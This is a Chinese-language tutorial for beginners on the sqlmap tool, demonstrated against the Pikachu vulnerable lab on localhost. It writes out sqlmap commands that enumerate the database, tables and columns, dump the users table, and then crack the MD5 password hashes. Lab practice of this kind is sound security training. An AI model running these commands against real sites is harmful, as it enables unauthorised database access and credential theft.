sqlmap工具使用入门
我之前写过一篇sqlmap的基本入门,那个是以墨者学院的靶场为例,这里我们用pikachu重新演示一下。
打开sqlmap和pikachu的字符型注入。
在pikachu的输入框中随意输入数字,使其出现注入点
在sqlmap中输入python sqlmap.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” --current-db
·引号内的是有注入点的网址,‘–current-db’是获取数据库名
【注:千万不要多空格或者少空格,否则不识别】
这样我们就获得了数据库名,然后利用数据库名,获取表名
输入:python sqlmap.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu --tables
一般在数据库中,用户名默认为“users”,因此我们利用users获取列名
输入:python SQLMAP.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu -T users --columns
然后我们利用‘username’和‘password’获取用户名和密码
由于这里的表和列都挺少,我们可以直接将列中的内容输出:
输入:python SQLMAP.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=查询” -D pikachu -T users --dump
这里的密码处于md5加密模式,我们只需要上网使用md5解密工具即可获取密码